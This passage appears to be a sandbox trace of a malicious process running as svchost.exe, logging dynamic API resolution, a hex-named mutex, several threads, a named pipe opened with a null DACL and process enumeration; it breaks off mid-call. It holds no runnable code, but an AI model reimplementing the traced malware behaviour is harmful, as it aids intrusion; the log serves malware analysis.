GetProcAddress (hModule=0x759c0000, lpProcName="CreateEventW") returned 0x759d183e [0312.910] GetProcAddress (hModule=0x759c0000, lpProcName="WaitForSingleObject") returned 0x759d1136 [0312.910] GetProcAddress (hModule=0x759c0000, lpProcName="WaitForMultipleObjects") returned 0x759d4220 [0312.910] GetProcAddress (hModule=0x759c0000, lpProcName="GetTickCount") returned 0x759d110c [0312.910] GetProcAddress (hModule=0x759c0000, lpProcName="VirtualFree") returned 0x759d186e [0312.910] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x758c0000 [0312.920] GetProcAddress (hModule=0x758c0000, lpProcName="GetIconInfo") returned 0x758e49ea [0312.920] GetProcAddress (hModule=0x758c0000, lpProcName="DrawIcon") returned 0x758e8deb [0312.920] GetProcAddress (hModule=0x758c0000, lpProcName="LoadImageW") returned 0x758dfbd1 [0312.920] GetProcAddress (hModule=0x758c0000, lpProcName="GetCursorPos") returned 0x758e1218 [0312.920] GetProcAddress (hModule=0x758c0000, lpProcName="DefWindowProcW") returned 0x77ce25dd [0312.920] GetProcAddress (hModule=0x758c0000, lpProcName="CreateWindowExW") returned 0x758d8a29 [0312.920] GetProcAddress (hModule=0x758c0000, lpProcName="UnregisterClassW") returned 0x758d9f84 [0312.920] GetProcAddress (hModule=0x758c0000, lpProcName="GetKeyboardLayoutList") returned 0x758e2e69 [0312.920] GetProcAddress (hModule=0x758c0000, lpProcName="CharLowerA") returned 0x758e3e75 [0312.920] GetProcAddress (hModule=0x758c0000, lpProcName="CharToOemW") returned 0x75931a26 [0312.921] GetProcAddress (hModule=0x758c0000, lpProcName="TranslateMessage") returned 0x758d7809 [0312.921] GetProcAddress (hModule=0x758c0000, lpProcName="PeekMessageW") returned 0x758e05ba [0312.921] GetProcAddress (hModule=0x758c0000, lpProcName="DispatchMessageW") returned 0x758d787b [0312.921] GetProcAddress (hModule=0x758c0000, lpProcName="MsgWaitForMultipleObjects") returned 0x758e0b4a [0312.921] GetProcAddress (hModule=0x758c0000, lpProcName="RegisterClassExW") returned 0x758db17d [0312.921] GetProcAddress (hModule=0x758c0000, lpProcName="SetWindowLongA") returned 0x758e6110 [0312.921] GetProcAddress (hModule=0x758c0000, lpProcName="GetWindowLongA") returned 0x758dd156 [0312.921] GetProcAddress (hModule=0x758c0000, lpProcName="CharUpperW") returned 0x758df350 [0312.921] GetProcAddress (hModule=0x758c0000, lpProcName="DestroyWindow") returned 0x758d9a55 [0312.921] LoadLibraryA (lpLibFileName="CRYPT32.dll") returned 0x76240000 [0312.923] GetProcAddress (hModule=0x76240000, lpProcName="CryptImportPublicKeyInfo") returned 0x76256c0e [0312.923] GetProcAddress (hModule=0x76240000, lpProcName="CryptDecodeObjectEx") returned 0x7624d718 [0312.923] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77740000 [0312.923] GetProcAddress (hModule=0x77740000, lpProcName="RegCloseKey") returned 0x7775469d [0312.923] GetProcAddress (hModule=0x77740000, lpProcName="GetAce") returned 0x777545f0 [0312.923] GetProcAddress (hModule=0x77740000, lpProcName="CryptEncrypt") returned 0x7776779b [0312.923] GetProcAddress (hModule=0x77740000, lpProcName="GetSidSubAuthorityCount") returned 0x77750e0c [0312.923] GetProcAddress (hModule=0x77740000, lpProcName="AllocateAndInitializeSid") returned 0x777540e6 [0312.924] GetProcAddress (hModule=0x77740000, lpProcName="GetSidSubAuthority") returned 0x77750e24 [0312.924] GetProcAddress (hModule=0x77740000, lpProcName="SetEntriesInAclW") returned 0x77752a66 [0312.924] GetProcAddress (hModule=0x77740000, lpProcName="RegCreateKeyExW") returned 0x777540fe [0312.924] GetProcAddress (hModule=0x77740000, lpProcName="CryptVerifySignatureW") returned 0x7774c54a [0312.924] GetProcAddress (hModule=0x77740000, lpProcName="SetNamedSecurityInfoW") returned 0x77749fe2 [0312.924] GetProcAddress (hModule=0x77740000, lpProcName="GetNamedSecurityInfoW") returned 0x7774f4fd [0312.924] GetProcAddress (hModule=0x77740000, lpProcName="CryptCreateHash") returned 0x7774df4e [0312.924] GetProcAddress (hModule=0x77740000, lpProcName="CryptHashData") returned 0x7774df36 [0312.924] GetProcAddress (hModule=0x77740000, lpProcName="SetSecurityDescriptorSacl") returned 0x77754680 [0312.924] GetProcAddress (hModule=0x77740000, lpProcName="RegSetValueExW") returned 0x777514d6 [0312.924] GetProcAddress (hModule=0x77740000, lpProcName="CryptDestroyHash") returned 0x7774df66 [0312.924] GetProcAddress (hModule=0x77740000, lpProcName="OpenProcessToken") returned 0x77754304 [0312.925] GetProcAddress (hModule=0x77740000, lpProcName="FreeSid") returned 0x7775412e [0312.925] GetProcAddress (hModule=0x77740000, lpProcName="InitializeSecurityDescriptor") returned 0x77754620 [0312.925] GetProcAddress (hModule=0x77740000, lpProcName="RegOpenKeyExW") returned 0x7775468d [0312.925] GetProcAddress (hModule=0x77740000, lpProcName="CryptImportKey") returned 0x7774c532 [0312.925] GetProcAddress (hModule=0x77740000, lpProcName="ConvertStringSecurityDescriptorToSecurityDescriptorW") returned 0x77751f59 [0312.925] GetProcAddress (hModule=0x77740000, lpProcName="OpenThreadToken") returned 0x7775432c [0312.925] GetProcAddress (hModule=0x77740000, lpProcName="RegQueryValueExW") returned 0x777546ad [0312.925] GetProcAddress (hModule=0x77740000, lpProcName="CryptReleaseContext") returned 0x7774e124 [0312.925] GetProcAddress (hModule=0x77740000, lpProcName="GetTokenInformation") returned 0x7775431c [0312.925] GetProcAddress (hModule=0x77740000, lpProcName="CryptDestroyKey") returned 0x7774c51a [0312.925] GetProcAddress (hModule=0x77740000, lpProcName="AdjustTokenPrivileges") returned 0x7775418e [0312.925] GetProcAddress (hModule=0x77740000, lpProcName="SetSecurityDescriptorDacl") returned 0x7775415e [0312.925] GetProcAddress (hModule=0x77740000, lpProcName="GetSecurityDescriptorSacl") returned 0x77754608 [0312.925] GetProcAddress (hModule=0x77740000, lpProcName="LookupPrivilegeValueW") returned 0x777541b3 [0312.925] GetProcAddress (hModule=0x77740000, lpProcName="GetLengthSid") returned 0x7775413b [0312.925] GetProcAddress (hModule=0x77740000, lpProcName="RegDeleteValueW") returned 0x7774cf31 [0312.925] GetProcAddress (hModule=0x77740000, lpProcName="RegFlushKey") returned 0x7776773f [0312.925] GetProcAddress (hModule=0x77740000, lpProcName="RegNotifyChangeKeyValue") returned 0x7774e15b [0312.926] GetProcAddress (hModule=0x77740000, lpProcName="RegQueryInfoKeyW") returned 0x777546e7 [0312.926] GetProcAddress (hModule=0x77740000, lpProcName="RegEnumKeyW") returned 0x7775445b [0312.926] GetProcAddress (hModule=0x77740000, lpProcName="InitiateSystemShutdownExW") returned 0x7779db3a [0312.926] GetProcAddress (hModule=0x77740000, lpProcName="CryptAcquireContextW") returned 0x7774df14 [0312.926] LoadLibraryA (lpLibFileName="SHELL32.dll") returned 0x76a70000 [0312.928] GetProcAddress (hModule=0x76a70000, lpProcName="ShellExecuteW") returned 0x76a83c71 [0312.929] GetProcAddress (hModule=0x76a70000, lpProcName="ShellExecuteExW") returned 0x76a91e46 [0312.929] GetProcAddress (hModule=0x76a70000, lpProcName="SHGetFolderPathW") returned 0x76af5708 [0312.929] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x76370000 [0312.929] GetProcAddress (hModule=0x76370000, lpProcName="PathFileExistsW") returned 0x763845bf [0312.929] GetProcAddress (hModule=0x76370000, lpProcName="PathIsURLW") returned 0x763855bf [0312.929] GetProcAddress (hModule=0x76370000, lpProcName="PathIsDirectoryEmptyW") returned 0x763acd81 [0312.929] GetProcAddress (hModule=0x76370000, lpProcName="StrCmpNIW") returned 0x76384745 [0312.929] GetProcAddress (hModule=0x76370000, lpProcName="PathRenameExtensionW") returned 0x763ad32a [0312.929] GetProcAddress (hModule=0x76370000, lpProcName="StrStrIW") returned 0x763846e9 [0312.929] GetProcAddress (hModule=0x76370000, lpProcName="PathMatchSpecW") returned 0x763886f7 [0312.929] GetProcAddress (hModule=0x76370000, lpProcName="PathCombineW") returned 0x7638c39c [0312.929] GetProcAddress (hModule=0x76370000, lpProcName="PathRemoveFileSpecW") returned 0x76383248 [0312.929] GetProcAddress (hModule=0x76370000, lpProcName="PathAddBackslashW") returned 0x7638c177 [0312.929] GetProcAddress (hModule=0x76370000, lpProcName="wvnsprintfW") returned 0x763b066c [0312.930] GetProcAddress (hModule=0x76370000, lpProcName="PathUnquoteSpacesW") returned 0x76385331 [0312.930] GetProcAddress (hModule=0x76370000, lpProcName="PathSkipRootW") returned 0x7639fbf5 [0312.930] GetProcAddress (hModule=0x76370000, lpProcName="PathFindExtensionW") returned 0x7638a1b9 [0312.930] GetProcAddress (hModule=0x76370000, lpProcName="SHDeleteValueW") returned 0x7637fcca [0312.930] GetProcAddress (hModule=0x76370000, lpProcName="wvnsprintfA") returned 0x7639edfe [0312.930] GetProcAddress (hModule=0x76370000, lpProcName="PathIsDirectoryW") returned 0x7637ff07 [0312.930] GetProcAddress (hModule=0x76370000, lpProcName="PathRemoveBackslashW") returned 0x76385c62 [0312.930] GetProcAddress (hModule=0x76370000, lpProcName="UrlUnescapeA") returned 0x7639c6fb [0312.930] GetProcAddress (hModule=0x76370000, lpProcName="PathQuoteSpacesW") returned 0x763ace21 [0312.930] LoadLibraryA (lpLibFileName="PSAPI.DLL") returned 0x75ad0000 [0312.930] GetProcAddress (hModule=0x75ad0000, lpProcName="GetModuleFileNameExW") returned 0x75ad13f0 [0312.930] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x75ae0000 [0312.932] GetProcAddress (hModule=0x75ae0000, lpProcName="CLSIDFromString") returned 0x75afe599 [0312.932] GetProcAddress (hModule=0x75ae0000, lpProcName="CoInitializeEx") returned 0x75b209ad [0312.932] GetProcAddress (hModule=0x75ae0000, lpProcName="CreateStreamOnHGlobal") returned 0x75b0363b [0312.932] GetProcAddress (hModule=0x75ae0000, lpProcName="CoSetProxyBlanket") returned 0x75af5ea5 [0312.932] GetProcAddress (hModule=0x75ae0000, lpProcName="CoCreateInstance") returned 0x75b29d0b [0312.932] GetProcAddress (hModule=0x75ae0000, lpProcName="CoUninitialize") returned 0x75b286d3 [0312.932] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x76950000 [0312.932] GetProcAddress (hModule=0x76950000, lpProcName="DeleteObject") returned 0x76965689 [0312.932] GetProcAddress (hModule=0x76950000, lpProcName="GetDeviceCaps") returned 0x76964de0 [0312.933] GetProcAddress (hModule=0x76950000, lpProcName="CreateDCW") returned 0x7696e743 [0312.933] GetProcAddress (hModule=0x76950000, lpProcName="CreateCompatibleDC") returned 0x769654f4 [0312.933] GetProcAddress (hModule=0x76950000, lpProcName="SelectObject") returned 0x76964f70 [0312.933] GetProcAddress (hModule=0x76950000, lpProcName="CreateCompatibleBitmap") returned 0x76965f49 [0312.933] GetProcAddress (hModule=0x76950000, lpProcName="BitBlt") returned 0x76965ea6 [0312.933] GetProcAddress (hModule=0x76950000, lpProcName="DeleteDC") returned 0x769658b3 [0312.933] LoadLibraryA (lpLibFileName="WININET.dll") returned 0x75f20000 [0312.936] GetProcAddress (hModule=0x75f20000, lpProcName="InternetConnectA") returned 0x75f449e9 [0312.936] GetProcAddress (hModule=0x75f20000, lpProcName="InternetReadFile") returned 0x75f3b406 [0312.936] GetProcAddress (hModule=0x75f20000, lpProcName="HttpQueryInfoA") returned 0x75f3a33e [0312.936] GetProcAddress (hModule=0x75f20000, lpProcName="InternetQueryOptionA") returned 0x75f31b56 [0312.936] GetProcAddress (hModule=0x75f20000, lpProcName="HttpOpenRequestA") returned 0x75f44c7d [0312.936] GetProcAddress (hModule=0x75f20000, lpProcName="InternetCrackUrlA") returned 0x75f2d075 [0312.936] GetProcAddress (hModule=0x75f20000, lpProcName="InternetSetOptionA") returned 0x75f375e8 [0312.936] GetProcAddress (hModule=0x75f20000, lpProcName="InternetOpenA") returned 0x75f4f18e [0312.936] GetProcAddress (hModule=0x75f20000, lpProcName="InternetCloseHandle") returned 0x75f3ab49 [0312.936] GetProcAddress (hModule=0x75f20000, lpProcName="HttpSendRequestA") returned 0x75fb18f8 [0312.936] LoadLibraryA (lpLibFileName="urlmon.dll") returned 0x76690000 [0312.937] GetProcAddress (hModule=0x76690000, lpProcName="ObtainUserAgentString") returned 0x766c1d76 [0312.937] LoadLibraryA (lpLibFileName="OLEAUT32.dll") returned 0x761b0000 [0312.937] GetProcAddress (hModule=0x761b0000, lpProcName=0x9) returned 0x761b3eae [0312.937] LoadLibraryA (lpLibFileName="Secur32.dll") returned 0x75690000 [0312.937] GetProcAddress (hModule=0x75690000, lpProcName="GetUserNameExW") returned 0x7582a415 [0312.937] GetCurrentProcessId () returned 0x320 [0312.938] CryptAcquireContextW (in: phProv=0x87e5c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x87e5c*=0x3de630) returned 1 [0312.948] RtlAddVectoredExceptionHandler (FirstHandler=0x1, VectoredHandler=0x784e9) returned 0x3de250 [0312.948] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x877f0, dwRevision=0x1 | out: pSecurityDescriptor=0x877f0) returned 1 [0312.948] SetSecurityDescriptorDacl (in: pSecurityDescriptor=0x877f0, bDaclPresent=1, pDacl=0x0, bDaclDefaulted=0 | out: pSecurityDescriptor=0x877f0) returned 1 [0312.948] ConvertStringSecurityDescriptorToSecurityDescriptorW () returned 0x1 [0312.951] GetSecurityDescriptorSacl (in: pSecurityDescriptor=0x3da500, lpbSaclPresent=0x33f3f8, pSacl=0x33f400, lpbSaclDefaulted=0x33f3fc | out: lpbSaclPresent=0x33f3f8, pSacl=0x33f400, lpbSaclDefaulted=0x33f3fc) returned 1 [0312.951] SetSecurityDescriptorSacl (in: pSecurityDescriptor=0x877f0, bSaclPresent=1, pSacl=0x3da514, bSaclDefaulted=0 | out: pSecurityDescriptor=0x877f0) returned 1 [0312.951] GetVersionExW (in: lpVersionInformation=0x33f2ec*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x77ce3472, dwMinorVersion=0x0, dwBuildNumber=0x3e1570, dwPlatformId=0x0, szCSDVersion="ⴼ疝ⴼ疝") | out: lpVersionInformation=0x33f2ec*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0312.951] GetVersionExW (in: lpVersionInformation=0x33f2d8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x33f390, dwMinorVersion=0x77dfd, dwBuildNumber=0x6, dwPlatformId=0x1, szCSDVersion="Ĝ") | out: lpVersionInformation=0x33f2d8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0312.951] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20008, TokenHandle=0x33f404 | out: TokenHandle=0x33f404*=0xe0) returned 1 [0312.951] GetTokenInformation (in: TokenHandle=0xe0, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x33f400 | out: TokenInformation=0x0, ReturnLength=0x33f400) returned 0 [0312.951] GetLastError () returned 0x7a [0312.951] GetTokenInformation (in: TokenHandle=0xe0, TokenInformationClass=0x19, TokenInformation=0x23cf7d0, TokenInformationLength=0x14, ReturnLength=0x33f400 | out: TokenInformation=0x23cf7d0, ReturnLength=0x33f400) returned 1 [0312.951] GetSidSubAuthorityCount (pSid=0x23cf7d8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x23cf7d9 [0312.951] GetSidSubAuthority (pSid=0x23cf7d8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x23cf7e0 [0312.951] CloseHandle (hObject=0xe0) returned 1 [0312.951] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x33fe7c | out: TokenHandle=0x33fe7c*=0xe0) returned 1 [0312.951] GetTokenInformation (in: TokenHandle=0xe0, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x33fe64 | out: TokenInformation=0x0, ReturnLength=0x33fe64) returned 0 [0312.951] GetLastError () returned 0x7a [0312.951] GetTokenInformation (in: TokenHandle=0xe0, TokenInformationClass=0x1, TokenInformation=0x23cf7d0, TokenInformationLength=0x24, ReturnLength=0x33fe64 | out: TokenInformation=0x23cf7d0, ReturnLength=0x33fe64) returned 1 [0312.951] GetTokenInformation (in: TokenHandle=0xe0, TokenInformationClass=0xc, TokenInformation=0x877e0, TokenInformationLength=0x4, ReturnLength=0x33fe78 | out: TokenInformation=0x877e0, ReturnLength=0x33fe78) returned 1 [0312.951] CloseHandle (hObject=0xe0) returned 1 [0312.951] GetLengthSid (pSid=0x23cf7d8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0312.951] GetCurrentProcess () returned 0xffffffff [0312.951] GetModuleFileNameExW (in: hProcess=0xffffffff, hModule=0x0, lpFilename=0x33fc7c, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\svchost.exe" (normalized: "c:\\windows\\syswow64\\svchost.exe")) returned 0x1f [0312.951] wvnsprintfW (in: pszDest=0x33fbc8, cchDest=3, pszFmt="%02X", arglist=0x33fba4 | out: pszDest="E5") returned 2 [0312.951] wvnsprintfW (in: pszDest=0x33fbc8, cchDest=3, pszFmt="%02X", arglist=0x33fba4 | out: pszDest="8E") returned 2 [0312.951] wvnsprintfW (in: pszDest=0x33fbc8, cchDest=3, pszFmt="%02X", arglist=0x33fba4 | out: pszDest="FF") returned 2 [0312.951] wvnsprintfW (in: pszDest=0x33fbc8, cchDest=3, pszFmt="%02X", arglist=0x33fba4 | out: pszDest="54") returned 2 [0312.952] wvnsprintfW (in: pszDest=0x33fbc8, cchDest=3, pszFmt="%02X", arglist=0x33fba4 | out: pszDest="09") returned 2 [0312.952] wvnsprintfW (in: pszDest=0x33fbc8, cchDest=3, pszFmt="%02X", arglist=0x33fba4 | out: pszDest="68") returned 2 [0312.952] wvnsprintfW (in: pszDest=0x33fbc8, cchDest=3, pszFmt="%02X", arglist=0x33fba4 | out: pszDest="A4") returned 2 [0312.952] wvnsprintfW (in: pszDest=0x33fbc8, cchDest=3, pszFmt="%02X", arglist=0x33fba4 | out: pszDest="36") returned 2 [0312.952] wvnsprintfW (in: pszDest=0x33fbc8, cchDest=3, pszFmt="%02X", arglist=0x33fba4 | out: pszDest="E9") returned 2 [0312.952] wvnsprintfW (in: pszDest=0x33fbc8, cchDest=3, pszFmt="%02X", arglist=0x33fba4 | out: pszDest="82") returned 2 [0312.952] wvnsprintfW (in: pszDest=0x33fbc8, cchDest=3, pszFmt="%02X", arglist=0x33fba4 | out: pszDest="FC") returned 2 [0312.952] wvnsprintfW (in: pszDest=0x33fbc8, cchDest=3, pszFmt="%02X", arglist=0x33fba4 | out: pszDest="FA") returned 2 [0312.952] wvnsprintfW (in: pszDest=0x33fbc8, cchDest=3, pszFmt="%02X", arglist=0x33fba4 | out: pszDest="1C") returned 2 [0312.952] wvnsprintfW (in: pszDest=0x33fbc8, cchDest=3, pszFmt="%02X", arglist=0x33fba4 | out: pszDest="04") returned 2 [0312.952] wvnsprintfW (in: pszDest=0x33fbc8, cchDest=3, pszFmt="%02X", arglist=0x33fba4 | out: pszDest="45") returned 2 [0312.952] wvnsprintfW (in: pszDest=0x33fbc8, cchDest=3, pszFmt="%02X", arglist=0x33fba4 | out: pszDest="A2") returned 2 [0312.952] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=1, lpName="E58EFF540968A436E982FCFA1C0445A2") returned 0xe0 [0312.952] GetLastError () returned 0x0 [0312.952] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x7b1d3, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xe4 [0312.952] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x795f6, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xe8 [0312.953] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x799af, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xec [0312.953] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x7b416, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xf0 [0312.953] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x7c086, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xf4 [0312.954] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x7f274, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xf8 [0312.954] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x78f74, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x33f7c8 | out: lpThreadId=0x33f7c8*=0x7d0) returned 0xfc [0312.954] CloseHandle (hObject=0xfc) returned 1 Thread: id = 207 os_tid = 0x420 Thread: id = 208 os_tid = 0x318 [0312.955] wvnsprintfW (in: pszDest=0x55f680, cchDest=3, pszFmt="%02X", arglist=0x55f65c | out: pszDest="D3") returned 2 [0312.955] wvnsprintfW (in: pszDest=0x55f680, cchDest=3, pszFmt="%02X", arglist=0x55f65c | out: pszDest="B6") returned 2 [0312.955] wvnsprintfW (in: pszDest=0x55f680, cchDest=3, pszFmt="%02X", arglist=0x55f65c | out: pszDest="C4") returned 2 [0312.955] wvnsprintfW (in: pszDest=0x55f680, cchDest=3, pszFmt="%02X", arglist=0x55f65c | out: pszDest="DE") returned 2 [0312.955] wvnsprintfW (in: pszDest=0x55f680, cchDest=3, pszFmt="%02X", arglist=0x55f65c | out: pszDest="8C") returned 2 [0312.955] wvnsprintfW (in: pszDest=0x55f680, cchDest=3, pszFmt="%02X", arglist=0x55f65c | out: pszDest="F7") returned 2 [0312.955] wvnsprintfW (in: pszDest=0x55f680, cchDest=3, pszFmt="%02X", arglist=0x55f65c | out: pszDest="9A") returned 2 [0312.955] wvnsprintfW (in: pszDest=0x55f680, cchDest=3, pszFmt="%02X", arglist=0x55f65c | out: pszDest="85") returned 2 [0312.956] wvnsprintfW (in: pszDest=0x55f680, cchDest=3, pszFmt="%02X", arglist=0x55f65c | out: pszDest="4B") returned 2 [0312.956] wvnsprintfW (in: pszDest=0x55f680, cchDest=3, pszFmt="%02X", arglist=0x55f65c | out: pszDest="54") returned 2 [0312.956] wvnsprintfW (in: pszDest=0x55f680, cchDest=3, pszFmt="%02X", arglist=0x55f65c | out: pszDest="9E") returned 2 [0312.956] wvnsprintfW (in: pszDest=0x55f680, cchDest=3, pszFmt="%02X", arglist=0x55f65c | out: pszDest="E2") returned 2 [0312.956] wvnsprintfW (in: pszDest=0x55f680, cchDest=3, pszFmt="%02X", arglist=0x55f65c | out: pszDest="32") returned 2 [0312.956] wvnsprintfW (in: pszDest=0x55f680, cchDest=3, pszFmt="%02X", arglist=0x55f65c | out: pszDest="F0") returned 2 [0312.956] wvnsprintfW (in: pszDest=0x55f680, cchDest=3, pszFmt="%02X", arglist=0x55f65c | out: pszDest="8C") returned 2 [0312.956] wvnsprintfW (in: pszDest=0x55f680, cchDest=3, pszFmt="%02X", arglist=0x55f65c | out: pszDest="89") returned 2 [0312.956] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x23cf870, cbMultiByte=11, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11 [0312.956] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x23cf870, cbMultiByte=11, lpWideCharStr=0x23cf888, cchWideChar=12 | out: lpWideCharStr="\\\\.\\pipe\\%s") returned 11 [0312.956] wvnsprintfW (in: pszDest=0x23cf8b0, cchDest=523, pszFmt="\\\\.\\pipe\\%s", arglist=0x55f8dc | out: pszDest="\\\\.\\pipe\\D3B6C4DE8CF79A854B549EE232F08C89") returned 41 [0312.956] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0312.958] CreateNamedPipeW (lpName="\\\\.\\pipe\\D3B6C4DE8CF79A854B549EE232F08C89" (normalized: "pipe\\d3b6c4de8cf79a854b549ee232f08c89"), dwOpenMode=0x40000003, dwPipeMode=0x0, nMaxInstances=0xff, nOutBufferSize=0x0, nInBufferSize=0x0, nDefaultTimeOut=0x0, lpSecurityAttributes=0x877e4) returned 0x4c [0312.958] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0xb4 [0312.958] ConnectNamedPipe (in: hNamedPipe=0x4c, lpOverlapped=0x55f95c | out: lpOverlapped=0x55f95c) returned 0 [0312.958] GetLastError () returned 0x3e5 [0312.958] WaitForMultipleObjects (nCount=0x2, lpHandles=0x55f954*=0xb4, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0328.080] ReadFile (in: hFile=0x4c, lpBuffer=0x55f638, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x55f630, lpOverlapped=0x0 | out: lpBuffer=0x55f638*, lpNumberOfBytesRead=0x55f630*=0x4, lpOverlapped=0x0) returned 1 [0328.081] WriteFile (in: hFile=0x4c, lpBuffer=0x55f634*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x55f630, lpOverlapped=0x0 | out: lpBuffer=0x55f634*, lpNumberOfBytesWritten=0x55f630*=0x4, lpOverlapped=0x0) returned 1 [0328.081] WriteFile (in: hFile=0x4c, lpBuffer=0x238ded0*, nNumberOfBytesToWrite=0x2fe, lpNumberOfBytesWritten=0x55f630, lpOverlapped=0x0 | out: lpBuffer=0x238ded0*, lpNumberOfBytesWritten=0x55f630*=0x2fe, lpOverlapped=0x0) returned 1 [0328.081] FlushFileBuffers (hFile=0x4c) returned 1 [0328.081] DisconnectNamedPipe (hNamedPipe=0x4c) returned 1 [0328.081] CloseHandle (hObject=0xb4) returned 1 [0328.081] CloseHandle (hObject=0x4c) returned 1 [0328.081] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0328.081] CreateNamedPipeW (lpName="\\\\.\\pipe\\D3B6C4DE8CF79A854B549EE232F08C89" (normalized: "\\device\\namedpipe\\d3b6c4de8cf79a854b549ee232f08c89"), dwOpenMode=0x40000003, dwPipeMode=0x0, nMaxInstances=0xff, nOutBufferSize=0x0, nInBufferSize=0x0, nDefaultTimeOut=0x0, lpSecurityAttributes=0x877e4) returned 0x4c [0328.081] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0xb4 [0328.081] ConnectNamedPipe (in: hNamedPipe=0x4c, lpOverlapped=0x55f95c | out: lpOverlapped=0x55f95c) returned 0 [0328.081] GetLastError () returned 0x3e5 [0328.081] WaitForMultipleObjects (nCount=0x2, lpHandles=0x55f954*=0xb4, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0328.082] ReadFile (in: hFile=0x4c, lpBuffer=0x55f638, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x55f630, lpOverlapped=0x0 | out: lpBuffer=0x55f638*, lpNumberOfBytesRead=0x55f630*=0x4, lpOverlapped=0x0) returned 1 [0328.082] SetEvent (hEvent=0x8) returned 1 [0328.082] WriteFile (in: hFile=0x4c, lpBuffer=0x55f634*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x55f630, lpOverlapped=0x0 | out: lpBuffer=0x55f634*, lpNumberOfBytesWritten=0x55f630*=0x4, lpOverlapped=0x0) returned 1 [0328.107] WriteFile (in: hFile=0x4c, lpBuffer=0x235cc20*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x55f630, lpOverlapped=0x0 | out: lpBuffer=0x235cc20*, lpNumberOfBytesWritten=0x55f630*=0x4, lpOverlapped=0x0) returned 1 [0328.109] FlushFileBuffers (hFile=0x4c) returned 1 [0328.109] DisconnectNamedPipe (hNamedPipe=0x4c) returned 1 [0328.109] CloseHandle (hObject=0xb4) returned 1 [0328.109] CloseHandle (hObject=0x4c) returned 1 [0328.109] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x0 Thread: id = 209 os_tid = 0x31c [0312.959] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0312.959] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x7d0) returned 0x102 [0315.253] GetModuleHandleW (lpModuleName="ntdll.dll") returned 0x77cb0000 [0315.253] GetProcAddress (hModule=0x77cb0000, lpProcName="NtQuerySystemInformation") returned 0x77ccfda0 [0315.253] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x275fc94 | out: SystemInformation=0x0, ResultLength=0x275fc94*=0xac50) returned 0xc0000004 [0315.253] VirtualAlloc (lpAddress=0x0, 